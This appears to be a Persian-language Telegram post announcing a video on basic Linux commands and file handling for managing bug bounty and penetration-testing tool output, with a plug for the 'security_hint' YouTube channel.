🎞 ویدیو امروزمون در مورد کامند های ابتدایی و کار با فایل ها در لینوکس هست. یکی از موارد مهم که باید بدونید تا خروجی ابزار های مختلف باگ بانتی و پنتست رو بتونید مدیریت کنید😉
فقط یکم طولانی شده چون خواستم تک تک دستورات رو بررسی کنم و این سه تا موضوعی ک امروز گفتم به هم نزدیک تر بودن 😇
حمایت میکنید بزارم یوتیوب؟!😍
YouTube
فقط یکم طولانی شده چون خواستم تک تک دستورات رو بررسی کنم و این سه تا موضوعی ک امروز گفتم به هم نزدیک تر بودن 😇
حمایت میکنید بزارم یوتیوب؟!😍
YouTube
YouTube
security_hint
سلام. به کانال یوتیوب ما خوش اومدید. اینجا براتون ویدیو های مربوط به امنیت وباگ بانتی رو اپلود میکنیم
❤13👍3👎1💯1